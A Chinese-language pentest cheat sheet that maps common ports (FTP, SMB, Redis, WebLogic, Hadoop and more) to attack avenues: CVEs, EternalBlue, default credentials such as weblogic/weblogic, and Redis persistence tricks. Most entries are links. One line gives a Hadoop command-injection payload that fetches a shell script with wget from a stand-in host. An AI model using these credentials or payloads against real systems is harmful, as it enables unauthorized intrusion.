常见端口漏洞利用

常见端口漏洞利用

快速扫描:Masscan -p80,800 ip --rate=10000
  

21/ FTP

匿名/暴力破解
  拒绝服务

22/ SSH

暴力破解

23/ telnet

Winbox(cve-2018-14847)
  
为什么需要telnet?
  telnet就是查看某个端口是否可访问。我们在搞开发的时候,经常要用的端口就是 8080。那么你可以启动服务器,用telnet 去查看这个端口是否可用。

25/ SMTP

邮件伪造

161/ snmp

弱口令
  https://blog.csdn.net/archersaber39/article/details/78932252

389/ ladp

匿名访问
  https://www.cnblogs.com/persuit/p/5706432.html  ladp注入
  http://www.4hou.com/technology/9090.html
  https://www.freebuf.com/articles/web/149059.html

443/ ssl

openssl心脏出血
  https://paper.seebug.org/437/
  http://www.anquan.us/static/drops/papers-1381.html
  https://www.freebuf.com/sectool/33191.html

445/ smb

win10拒绝服务
  永恒之蓝RCE

875/ rsync

匿名访问
  http://www.anquan.us/static/bugs/wooyun-2016-0190815.html
  https://paper.seebug.org/409/
  http://www.91ri.org/11093.html

1433/ mssql

暴力破解
  http://www.anquan.us/static/drops/tips-12749.  html
  https://www.seebug.org/appdir/Microsoft%20SQL%20Server

1521/ oracle

暴力破解
  https://www.exploit-db.com/exploits/33084

2601/ zebra

http://www.anquan.us/static/bugs/wooyun-2013-047409.html

3128/ squid

3306/ mysql

RCE
  http://www.91ri.org/17511.html
  CVE-2015-0411
  hash破解
  https://www.freebuf.com/column/153561.html
  waf绕过
  https://www.freebuf.com/articles/web/155570.html
  general_log_file getshell
  https://www.freebuf.com/column/143125.html
  提权
  http://www.91ri.org/16540.html

3312/ kangle

getshell
  https://www.secpulse.com/archives/23927.html

3389/ rdp

shift 放大镜 输入法绕过 guest用户
  永恒之蓝(ESTEEMAUDIT)
  https://www.freebuf.com/articles/system/132171.html
  https://www.anquanke.com/post/id/86328
  ms12-020
  https://blog.csdn.net/meyo_leo/article/details/77950552

4440/ rundeck

https://www.secpulse.com/archives/29500.html

4848/ glassfish

文件读取
  https://www.secpulse.com/archives/42277.html  https://www.anquanke.com/post/id/85948
  
GlassFish2/ admin:admin
GlassFish3,4/ 如果管理员不设置帐号本地会自动登录,远程访问会提示配置错误

5432/ PostgreSQL

RCE
  https://www.cnblogs.com/KevinGeorge/p/8521496.html
  https://www.secpulse.com/archives/69153.html
  默认账号postgres
  参考
  http://www.91ri.org/13070.html
  http://www.91ri.org/6507.html

5672,15672,4369,25672/ RabbitMQ

(guest/guest)

5900/ VNC

https://www.seebug.org/appdir/RealVNC

5984/ CouchDB

http://xxx:5984/_utils/

6082/ varnish

CLI 未授权
  https://www.secpulse.com/archives/10681.html

6379/ redis

Redis
未授权
   ssh publickey
   crontab
   webshell
   反序列化
   开机自启文件夹写bat
   参考https://www.freebuf.com/column/170710.html

7001,7002/ WebLogic

默认弱口令
  weblogic/weblogic ,weblogic/welcom ,weblogic/welcom1,weblogic1/weblogic
  反序列
  CVE-2018-2628
  https://www.freebuf.com/articles/web/169770.html
  https://www.seebug.org/appdir/WebLogic

9200,9300/ elasticsearch

CVE-2015-1427
  http://www.anquan.us/static/drops/papers-5142.html
  CVE-2018-17246
  https://www.seebug.org/vuldb/ssvid-97730
  参考
  https://www.seebug.org/search/?keywords=elasticsearch

9000/ fcgi

https://paper.seebug.org/289/

9043/ WebSphere

Websphere8.5
  https://localhost:9043/ibm/console/logon.jsp
  
Websphere6-7
  http://localhost:9043/ibm/console
  后台未授权,登录后可部署WAR包
  SOAP服务有反序列化
  弱口令:admin /password

11211/ memcache

未授权
  UDP反射
  https://shockerli.net/post/memcached-udp-reflection-attack-bug/

27017,27018/ Mongodb

未授权
  注入
  https://www.anquanke.com/post/id/83763
  phpMoAdmin RCE
  https://www.aqniu.com/threat-alert/6978.html

50000/ SAP

SAP命令执行
  https://www.secpulse.com/archives/20204.html

50070,50030/ hadoop

未授权
  https://www.freebuf.com/vuls/173638.html
  命令执行
  host:50060/pstack?pid=123|wget http://somehost/shell.sh
  https://www.seebug.org/search/?keywords=hadoop
  其他
  http://www.91ri.org/15441.html

你可能感兴趣的:(常见端口漏洞利用)